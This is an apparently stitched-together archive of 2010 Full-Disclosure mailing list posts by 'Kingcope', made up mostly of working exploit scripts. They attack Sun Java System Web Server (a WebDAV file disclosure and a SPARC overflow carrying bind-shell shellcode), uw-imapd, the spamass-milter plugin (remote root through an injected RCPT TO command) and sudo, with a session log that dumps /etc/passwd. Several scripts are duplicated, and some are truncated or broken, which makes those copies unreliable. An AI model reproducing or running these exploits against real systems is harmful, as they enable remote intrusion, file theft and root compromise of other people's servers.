use MIME::Base64;
$|=1;
$sock = IO::Socket::INET->new(PeerAddr => 'localhost',
PeerPort => '25',
Proto=> 'tcp');
print $sock "EHLO you\r\n";
print $sock "MAIL FROM: \r\n";
print $sock "RCPT TO: \r\n";
print $sock "DATA\r\n";
print $sock "Date: 23 Oct 81 11:22:33\r\n";
print $sock "From: \r\n";
print $sock "To: \r\n";
print $sock "Subject: SUBSCRIBE
v...@\"../../../../../../../../../../../../../../../../../users/kcope/openshare/foobar\r\n";
print $sock "\r\n\r\ntest\r\n.\r\nQUIT\r\n";
print ".";
while(<$sock>) {
print;
}
---snip---
Regards and Signed,
Kingcope
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sun D3VS SM0KiNG PoT AGAiN
www.isowarez.de - you have no idea what we're able to r0xx000Or
2010/4/3 Christian Sciberras :
> "Sun D3VS SM0KiNG PoT AGAiN"
> "SuPP0RT iF YOU#RE kRAD KTHX"
>
> What the fuck is wrong with you guys?
> Ever gave the psychiatrist a visit?
>
>
>
>
>
>
> On Sat, Apr 3, 2010 at 3:14 PM, Kingcope wrote:
>>
>> sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD
>> KTHX
>>
>> #!/usr/bin/perl
>> # aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT
>> # oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
>> # oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
>> # oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
>> # !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
>> # MAY/2010
>> # VERY THANKS TO LSD
>> #
>> #
>> # oO VERiFIED oN Oo
>> #
>> # SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS
>> SERVER 2008 & SunOS 5.10]
>> # SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
>> # [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
>> # RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
>>
>> use IO::Socket;
>> use MIME::Base64;
>>
>> print "//Sun Microsystems Sun Java System Web Server\n";
>> print "//Remote File Disclosure Exploit\n";
>> print "//by Kingcope\n";
>> print "May/2010\n";
>>
>> if ($#ARGV != 2) {
>> print "usage: perl sunone.pl > get>\n";
>> print "sample: perl sunone.pl lib7.berkeley.edu /dav
>> /etc/passwd\n";
>> exit;
>> }
>>
>> $target = $ARGV[0];
>>
>> $|=1;
>>
>> $remotefile = $ARGV[2];
>> $folder = $ARGV[1];
>>
>> $KRADXmL =
>> "\n"
>> ."> ."\n"
>> ."]>\n"
>> ."\n"
>> ."\n"
>> ."\n"
>> ."\n"
>> ."\n"
>> ."\n"
>> ."&RemoteX;\n"
>> ."\n"
>> ."\n"
>> ."\n"
>> ."\n";
>>
>> $sock = IO::Socket::INET->new(PeerAddr => $target,
>> PeerPort => '80',
>> Proto => 'tcp');
>>
>> print $sock "LOCK /$folder HTTP/1.1\r\n".
>> "Host: $target\r\n".
>> "Depth: 0\r\n".
>> "Connection: close\r\n".
>> "Content-Type: application/xml\r\nContent-Length:
>> ".length($KRADXmL)."\r\n\r\n".
>> $KRADXmL;
>>
>> $locktoken = "";
>> while(<$sock>) {
>> if ($_ =~ /^Lock-token:\s(.*)?\r/) {
>> $locktoken = $1;
>> chomp $locktoken;
>> }
>> print;
>> }
>>
>> close($sock);
>>
>> $sock = IO::Socket::INET->new(PeerAddr => $target,
>> PeerPort => '80',
>> Proto => 'tcp');
>>
>> print $sock "UNLOCK /$folder HTTP/1.1\r\n".
>> "Host: $target\r\n".
>> "Connection: close\r\n".
>> "Lock-token: $locktoken\r\n\r\n";
>>
>> while(<$sock>) {
>> print;
>> }
>> close($sock);
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CRiMiNAL MiNDED - iSOWAR3Z SPLOiT
#!/usr/bin/perl
# aN0THER TiP OF THE iCE-B3RG ReMOTE eXPLoiT
# //Sun Microsystems Sun Java System Web Server
# //*Broken One Target Remote Exploit for Sparc*
# //by Kingcope and lsd
# //Bug Found by immunity/gleg CVE-2010-0361
# May/2010
#
# **WORKS ONLY ON [ ADD YOUR TARGETS AS YOU WiSH KTHX ] **
# SunOS unknown 5.10 Generic_141444-09 sun4u sparc SUNW,Sun-Blade-1500
# Sun Java System Web Server 7.0 B12/04/2006
# Should give you uid=80(webservd) gid=80(webservd)
# RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
use IO::Socket;
# solaris_sparc_bind - LPORT= http://metasploit.com
my $payloadS =
"%23%32%de%d7%a2%14%62%6f%20%bf%ff%ff%20%bf%ff%ff".
"%7f%ff%ff%ff%ea%03%e0%20%aa%9d%40%11%ea%23%e0%20".
"%a2%04%40%15%81%db%e0%20%12%bf%ff%fb%9e%03%e0%04".
"%57%50%fe%68%ff%b6%de%77%69%ad%de%7c%01%cb%1e%89".
"%bb%fc%be%8f%2b%ec%9e%8d%ce%1c%fe%77%5f%cc%df%7f".
"%8f%ce%a0%87%11%10%df%f2%f1%04%fe%4f%11%06%be%5f".
"%11%6b%7e%6b%03%4f%21%83%b7%80%01%b3%35%b0%61%5b".
"%a8%60%42%93%1b%83%3d%5b%09%94%62%9a%af%84%42%75".
"%3e%74%a3%8d%91%77%1c%75%83%62%23%8c%37%80%e3%87".
"%b5%b4%c3%7d%28%65%24%89%9b%a6%9b%71%8f%b8%c4%82".
"%3d%a9%24%8d%d5%6b%84%8c%54%7b%e4%b0%c9%ab%c4%c4".
"%f8%f3%fb%28%2d%0f%bb%28%59%15%04%c3%40%21%5c%49".
"%22%22%7c%03%01%41%a2%01%d5%75%fb%a5%47%5a%5b%cd".
"%87%a6%24%3d%97%fa%e4%45%d7%de%a4%49%5a%30%fb%8a".
"%cb%e0%db%e4%ec%01%1b%f4";
$|=1;
print "//Sun Microsystems Sun Java System Web Server\n";
print "//Remote Exploit for Sparc\n";
print "//by Kingcope and lsd\n";
print "May/2010\n";
if ($#ARGV != 2) {
print "usage: perl sunone.pl \n";
print "sample: perl sunone.pl lib7.berkeley.edu /dav unknown\n";
exit;
}
$target = $ARGV[0];
$wd = $ARGV[1];
$dm = $ARGV[2]; # domainname
$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '80',
Proto=> 'tcp');
$patch = pack("N", 0xf68782e0);
$ret = pack("N", 0xe23ef7f0); #
#$ret = pack("N", 0xf882f7fa); # u4
$nops = $ret . "%90" x 32;
$payloadS = $nops . $payloadS;
$v = ("V" x (313 - length($wd) - length($dm))) .
"BBB". $patch
."C".$patch."".$patch.$patch."JKKK".$patch.$patch.$patch.$patch."".$patch.$ret.$patch.$payloadS;
print $sock "OPTIONS /$wd/AA$v HTTP/1.1\r\nHost: $target\r\n\r\n";
while(<$sock>) {
print;
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CRiMiNAL M
#!/usr/bin/perl
# aN0THER TiP OF THE iCE-B3RG ReMOTE eXPLoiT
# //Sun Microsystems Sun Java System Web Server
# //*Broken One Target Remote Exploit for Sparc*
# //by Kingcope and lsd
# //Bug Found by immunity/gleg CVE-2010-0361
# May/2010
#
# **WORKS ONLY ON [ ADD YOUR TARGETS AS YOU WiSH KTHX ] **
# SunOS unknown 5.10 Generic_141444-09 sun4u sparc SUNW,Sun-Blade-1500
# Sun Java System Web Server 7.0 B12/04/2006
# Should give you uid=80(webservd) gid=80(webservd)
# RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
use IO::Socket;
# solaris_sparc_bind - LPORT= http://metasploit.com
my $payloadS =
"%23%32%de%d7%a2%14%62%6f%20%bf%ff%ff%20%bf%ff%ff".
"%7f%ff%ff%ff%ea%03%e0%20%aa%9d%40%11%ea%23%e0%20".
"%a2%04%40%15%81%db%e0%20%12%bf%ff%fb%9e%03%e0%04".
"%57%50%fe%68%ff%b6%de%77%69%ad%de%7c%01%cb%1e%89".
"%bb%fc%be%8f%2b%ec%9e%8d%ce%1c%fe%77%5f%cc%df%7f".
"%8f%ce%a0%87%11%10%df%f2%f1%04%fe%4f%11%06%be%5f".
"%11%6b%7e%6b%03%4f%21%83%b7%80%01%b3%35%b0%61%5b".
"%a8%60%42%93%1b%83%3d%5b%09%94%62%9a%af%84%42%75".
"%3e%74%a3%8d%91%77%1c%75%83%62%23%8c%37%80%e3%87".
"%b5%b4%c3%7d%28%65%24%89%9b%a6%9b%71%8f%b8%c4%82".
"%3d%a9%24%8d%d5%6b%84%8c%54%7b%e4%b0%c9%ab%c4%c4".
"%f8%f3%fb%28%2d%0f%bb%28%59%15%04%c3%40%21%5c%49".
"%22%22%7c%03%01%41%a2%01%d5%75%fb%a5%47%5a%5b%cd".
"%87%a6%24%3d%97%fa%e4%45%d7%de%a4%49%5a%30%fb%8a".
"%cb%e0%db%e4%ec%01%1b%f4";
$|=1;
print "//Sun Microsystems Sun Java System Web Server\n";
print "//Remote Exploit for Sparc\n";
print "//by Kingcope and lsd\n";
print "May/2010\n";
if ($#ARGV != 2) {
print "usage: perl sunone.pl \n";
print "sample: perl sunone.pl lib7.berkeley.edu /dav unknown\n";
exit;
}
$target = $ARGV[0];
$wd = $ARGV[1];
$dm = $ARGV[2]; # domainname
$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '80',
Proto=> 'tcp');
$patch = pack("N", 0xf68782e0);
$ret = pack("N", 0xe23ef7f0); #
#$ret = pack("N", 0xf882f7fa); # u4
$nops = $ret . "%90" x 32;
$payloadS = $nops . $payloadS;
$v = ("V" x (313 - length($wd) - length($dm))) .
"BBB". $patch
."C".$patch."".$patch.$patch."JKKK".$patch.$patch.$patch.$patch."".$patch.$ret.$patch.$payloadS;
print $sock "OPTIONS /$wd/AA$v HTTP/1.1\r\nHost: $target\r\n\r\n";
while(<$sock>) {
print;
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sun D3VS SM0KiNG PoT AGAiN
sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD KTHX
#!/usr/bin/perl
# aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT
# oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
# oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
# oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
# !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
# MAY/2010
# VERY THANKS TO LSD
#
#
# oO VERiFIED oN Oo
#
# SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS
SERVER 2008 & SunOS 5.10]
# SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
# [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
# RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
use IO::Socket;
use MIME::Base64;
print "//Sun Microsystems Sun Java System Web Server\n";
print "//Remote File Disclosure Exploit\n";
print "//by Kingcope\n";
print "May/2010\n";
if ($#ARGV != 2) {
print "usage: perl sunone.pl \n";
print "sample: perl sunone.pl lib7.berkeley.edu /dav /etc/passwd\n";
exit;
}
$target = $ARGV[0];
$|=1;
$remotefile = $ARGV[2];
$folder = $ARGV[1];
$KRADXmL =
"\n"
."\n"
."]>\n"
."\n"
."\n"
."\n"
."\n"
."\n"
."\n"
."&RemoteX;\n"
."\n"
."\n"
."\n"
."\n";
$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '80',
Proto=> 'tcp');
print $sock "LOCK /$folder HTTP/1.1\r\n".
"Host: $target\r\n".
"Depth: 0\r\n".
"Connection: close\r\n".
"Content-Type: application/xml\r\nContent-Length:
".length($KRADXmL)."\r\n\r\n".
$KRADXmL;
$locktoken = "";
while(<$sock>) {
if ($_ =~ /^Lock-token:\s(.*)?\r/) {
$locktoken = $1;
chomp $locktoken;
}
print;
}
close($sock);
$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '80',
Proto=> 'tcp');
print $sock "UNLOCK /$folder HTTP/1.1\r\n".
"Host: $target\r\n".
"Connection: close\r\n".
"Lock-token: $locktoken\r\n\r\n";
while(<$sock>) {
print;
}
close($sock);
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Sun D3VS SM0KiNG PoT AGAiN
#!/usr/bin/perl
# aN0THER TiP OF THE iCE-B3RG ReMOTE eXPLoiT
# oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
# oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
# oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
# !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
# MAY/2010
# VERY THANKS TO LSD
#
#
# oO VERiFIED oN Oo
#
# SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS
SERVER 2008 & SunOS 5.10]
# SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
# [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
# RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
use IO::Socket;
use MIME::Base64;
print "//Sun Microsystems Sun Java System Web Server\n";
print "//Remote File Disclosure Exploit\n";
print "//by Kingcope\n";
print "May/2010\n";
if ($#ARGV != 2) {
print "usage: perl sun.pl \n";
print "sample: perl sun.pl lib7.berkeley.edu /dav /etc/passwd\n";
exit;
}
$target = $ARGV[0];
$|=1;
$remotefile = $ARGV[2];
$folder = $ARGV[1];
$KRADXmL =
"\n"
."\n"
."]>\n"
."\n"
."\n"
."\n"
."\n"
."\n"
."\n"
."&RemoteX;\n"
."\n"
."\n"
."\n"
."\n";
print $sock "LOCK /$folder HTTP/1.1\r\n".
"Host: $target\r\n".
"Depth: 0\r\n".
"Connection: close\r\n".
"Content-Type: application/xml\r\nContent-Length:
".length($KRADXmL)."\r\n\r\n".
$KRADXmL;
$locktoken = "";
while(<$sock>) {
if ($_ =~ /^Lock-token:\s(.*)?\r/) {
$locktoken = $1;
chomp $locktoken;
}
print;
}
close($sock);
$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '8080',
Proto=> 'tcp');
print $sock "UNLOCK /$folder HTTP/1.1\r\n".
"Host: $target\r\n".
"Connection: close\r\n".
"Lock-token: $locktoken\r\n\r\n";
while(<$sock>) {
print;
}
close($sock);
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SecurityFocus to partially shut down
Packetstormsecurity.org for tha real! Let's see who can breath longer than them. To Securityfocus.com: "So tonight, I'm gonna find a way to make it without you, Tooonight, I'm gonna find a way to maaake it without you, I'm gonna hold on the times that we had, Tonight, I'm gonna find a way to make it without you." Alicia Keys /kc ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Two goodies. uw-imapd < 2004b remote exploit && spamass-milter vuln verifier
Bwaaha! You could modify the uw-imapd exploit to take over up to date uw-imapdz so they give you a shell (needs a username + password combination then and requires an MTA to run aside uw-imapd). Just a thought. Cheerio, Kingcope On Mo, 2010-03-15 at 21:36 +0100, Kingcope wrote: > I just saw an error in the uw-imapd exploit. > It's slightly broken. > > replace the line telling > > print $sock2 "RCPT TO kco...@$remhost[1]\r\n"; > > with > > print $sock2 "RCPT TO $ARGV[1]"."\...@$remhost[1]\r\n"; > > then it should be fine. > > > On Mo, 2010-03-15 at 21:27 +0100, Kingcope wrote: > > (See Attached) > > > > Cheers, > > > > Kingcope > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Two goodies. uw-imapd < 2004b remote exploit && spamass-milter vuln verifier
I just saw an error in the uw-imapd exploit. It's slightly broken. replace the line telling print $sock2 "RCPT TO kco...@$remhost[1]\r\n"; with print $sock2 "RCPT TO $ARGV[1]"."\...@$remhost[1]\r\n"; then it should be fine. On Mo, 2010-03-15 at 21:27 +0100, Kingcope wrote: > (See Attached) > > Cheers, > > Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Two goodies. uw-imapd < 2004b remote exploit && spamass-milter vuln verifier
(See Attached)
Cheers,
Kingcope
Here are two goodies.
1.) uw-imapd < imap-2004b Remote Exploit
2.) Spamass-milter 0day vulnerability verifier + root exploit (at the bottom)
WARNING: USE AT YOUR OWN RISK + YOU WON'T FIND MANY TARGETS FOR BOTHS VULNS, I
VERIFIED.
---snip---
#!/usr/bin/perl
# CVE-2005-0198 Exploit by Kingcope
# Exploited in May 2010
# One can See from the imap Banner if the Server is Vulnerable:
# Vulnerable (CRAM-MD5 supported and right IMAP4rev1 Version) is e.g.:
# * OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=CRAM-MD5 AUTH=LOGIN]
localhost IMAP4rev1 2002.332 at Sun, 14 Mar 2010 20:40:09 + (GMT)
# You need a VALID username but NOT A VALID password
# Relies on both uw-imapd (< imap-2004b) and a MTA like sendmail to be
installed remotely (.forward trickery).
# EXPLOIT SESSION:
#
#./imap.pl 192.168.2.17 kcope "cat /etc/passwd"
#uw-imapd (< imap-2004b) remote exploit by Kingcope
#* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=CRAM-MD5 AUTH=LOGIN]
[192.168.2.
#17] IMAP4rev1 2003.338 at Sun, 14 Mar 2010 23:53:53 + (GMT)
#
#++ Break In 1
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 OK [CAPABILITY IMAP4REV1 IDLE NAMESPACE MAILBOX-REFERRALS BINARY UNSELECT
S
#CAN SORT THREAD=REFERENCES THREAD=ORDEREDSUBJECT MULTIAPPEND] User kcope
authent
#icated
#++ SUCCESS 1 - Authenticated
#++ Break In 2
#220 localhost.Belkin ESMTP Sendmail 8.12.9p2/8.12.9; Sun, 14 Mar 2010 23:54:08
G
#MT
#250 localhost.Belkin Hello [192.168.2.15], pleased to meet you
#250 2.1.0 m...@foobar.org... Sender ok
#250 2.1.5 kc...@localhost.belkin... Recipient ok
#354 Enter mail, end with "." on a line by itself
#250 2.0.0 o2ENs82U002757 Message accepted for delivery
#++ Waiting for .forward file to be executed
#A002 OK DELETE completed
#A002 OK CREATE completed
#+ Ready for argument
#A002 OK APPEND completed
#* 1 EXISTS
#* 1 RECENT
#* OK [UIDVALIDITY 1268610848] UID validity status
#* OK [UIDNEXT 2] Predicted next UID
#* NO [UIDNOTSTICKY] Non-permanent unique identifiers: /tmp/0wned
#* FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
#* OK [PERMANENTFLAGS ()] Permanent flags
#* OK [UNSEEN 1] first unseen message in /tmp/0wned
#A002 OK [READ-ONLY] SELECT completed
#* 1 FETCH (BODY[] {1334}
#Date: Sun, 14 Mar 2010 23:54:08 +
#From: kc...@localhost.belkin
#Subject: /tmp/0wned
#MIME-Version: 1.0
#Content-Type: TEXT/PLAIN; charset=US-ASCII
# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $
#
#root:*:0:0:Charlie &:/root:/bin/csh
#toor:*:0:0:Bourne-again Superuser:/root:
#daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
#operator:*:2:5:System &:/:/sbin/nologin
#bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
#tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
#kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
#games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
#news:*:8:8:News Subsystem:/:/sbin/nologin
#man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
#sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
#smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
#mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
#bind:*:53:53:Bind Sandbox:/:/sbin/nologin
#uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
#xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin
#pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
#www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin
#nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
#kcope:*:1001:0:User &:/home/kcope:/bin/sh
#)
#* 1 FETCH (FLAGS (\Recent \Seen))
#A002 OK FETCH completed
use Digest::HMAC_MD5 qw(hmac_md5_hex);
use MIME::Base64;
use IO::Socket::INET;
print "uw-imapd (< imap-2004b) remote exploit by Kingcope\r\n";
if ($#ARGV != 2) {
print "usage: imap.pl \n";
print "example: imap.pl www.target.com foouser \"cat /etc/services\"\n";
exit;
}
$host = $ARGV[0];
$command = $ARGV[2];
$|=1;
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 143,
Proto=> 'tcp');
$resp = <$sock>;
print $resp."\n";
print "++ Break In 1\n";
for ($k=0;$k<5;$k++) {
print $sock "A001 AUTHENTICATE CRAM-MD5\r\n";
$resp = <$sock>;
print $resp;
if (index($resp, "+") != 0) {
print "-- No CRAM-MD5 Authen supported .\n";
exit;
}
$user = $ARGV[1];
$secret = "waco";
@data = split(" ", $resp);
chomp($data[1]);
$stamp = $data[1];
$decoded_stamp = decode_base64($stamp);
$hmac = hmac_md5_hex($decoded_stamp, $secret);
$answer = encode_base64($user . ' ' . $hmac);
chomp($answer);
print $sock $answer . "\r\n";
$resp = <$sock>;
print $resp;
if (index($res
[Full-disclosure] Spamassassin Milter Plugin Remote Root
Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory
Logic fuckup?
March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!
Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++
Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.
SpamAssassin is a project of the Apache Software Foundation (ASF).
Postfix
What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.
Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.
Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).
>From spamass-milter-0.3.1 (-latest) Line 820:
//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//
sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
struct context *sctx = (struct context*)smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif
debug(D_FUNC, "mlfi_envrcpt: enter");
if (flag_expand)
{
/* open a pipe to sendmail so we can do address
expansion */
char buf[1024];
char *fmt="%s -bv \"%s\" 2>&1";
#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
/* XXX possible buffer overflow here // is this a
joke ?! */
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif
debug(D_RCPT, "calling %s", buf);
#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS, "Could not lock popen mutex: %
s", strerror(rv));
abort();
}
#endif
p = popen(buf, "r");[1]
if (!p)
{
debug(D_RCPT, "popen failed(%s). Will not
expand aliases", strerror(errno));
assassin->expandedrcpt.push_back(envrcpt[0]);
[1] the vulnerable popen() call.
Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: m...@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
Signed,
Kingcope
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FreeBSD and OpenBSD ftpd bug (not exploitable?)
return 0;
}
else
//for (pop = gl.gl_pathv; pop && *pop && 1 <
(MAXGLOBARGS-1);
for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
pop++) {
printf("glob success");
return 0;
}
globfree(&gl);
}
main(int argc, char **argv) {
do_glob();
do_glob();
}
---snip---
05 March 2010
/kingcope
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Todd Miller Sudo local root exploit discovered by Slouching
Hello Andy, I am referring to the following forum posts. http://www.linuxquestions.org/questions/linux-security-4/the-use-of-sudoedit-command-question-785442/ /kcope Am Mittwoch, den 03.03.2010, 12:03 + schrieb a...@hotmail.com: > Hi Kingcope, > > but if the 'sudoers' file is correctly configured then you would not > have the appropriate sudo permission to run the 'sudoedit' as root. > > of course I'm assuming that the 'sudoers' file has not got the 'run > any command' in it. > > If the sudoers file used is even the default then I would think you would > get some error on the lines of: > > 'Sorry, user is not allowed to execute './sudoedit test' as root on this > machine'. > > Aren't you assuming the the sudoers file has a line in it that allows the > user in question to run the /home/myhome/sudoedit as sudo??? > > Or am I missing something? > > Andy > > On Tue, 2 Mar 2010, Kingcope wrote: > > > Just for the record. > > > > ---snip--- > > #!/bin/sh > > # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 > > # local root exploit > > # March 2010 > > # automated by kingcope > > # Full Credits to Slouching > > echo Tod Miller Sudo local root exploit > > echo by Slouching > > echo automated by kingcope > > if [ $# != 1 ] > > then > > echo "usage: ./sudoxpl.sh " > > exit > > fi > > cd /tmp > > cat > sudoedit << _EOF > > #!/bin/sh > > echo ALEX-ALEX > > su > > /bin/su > > /usr/bin/su > > _EOF > > chmod a+x ./sudoedit > > sudo ./sudoedit $1 > > --snip--- > > > > cheers, > > kingcope > > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Todd Miller Sudo local root exploit discovered by Slouching
Just for the record. ---snip--- #!/bin/sh # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 # local root exploit # March 2010 # automated by kingcope # Full Credits to Slouching echo Tod Miller Sudo local root exploit echo by Slouching echo automated by kingcope if [ $# != 1 ] then echo "usage: ./sudoxpl.sh " exit fi cd /tmp cat > sudoedit << _EOF #!/bin/sh echo ALEX-ALEX su /bin/su /usr/bin/su _EOF chmod a+x ./sudoedit sudo ./sudoedit $1 --snip--- cheers, kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Samba Remote Zero-Day Exploit
Hello Paul, First and foremost I did not know about the configuration setting which closes the bug when i posted the advisory. So this was my mistake. But for the most servers which are not entirely hardened (and my assumption is that this applies to many servers in internal networks) the traversal can be a serious issue, because a samba user (even nobody) can create the symlinks. It would in my point of view be more secure to only allow administrators to create symlinks as it is intended. Again I might be wrong with this thought. I first audited Windows Server 2008 for the new SMB2 hardlinking features. Symlinking on a windows server is possible but only when the remotely logged in account is the Administrator. Creating symlinks to paths outside the directory of the given share is not possible. However accessing a symlink in a directory which points to for example c:\ is possible. I don't say that because Samba should have the same semnatics as Windows, but because it's implemetation of handling remote to local and local to remote symbolic links is more secure. After failing in auditing the Windows servers on the potential vulnerabilites I just gave samba a try and the default configuration of my Ubuntu Desktop System and CentOS Server allowed me to conduct the attack out of the box. Turning off symlink support in samba closes the hole but then no access to symlinks created by the administrator is possible or am I wrong? With Respect, Kingcope Am Samstag, den 06.02.2010, 09:43 +1100 schrieb paul.sz...@sydney.edu.au: > Dear Dan, > > > The bug here is that out-of-path symlinks are remotely writable. ... > > You mean "creatable". > > > ... the 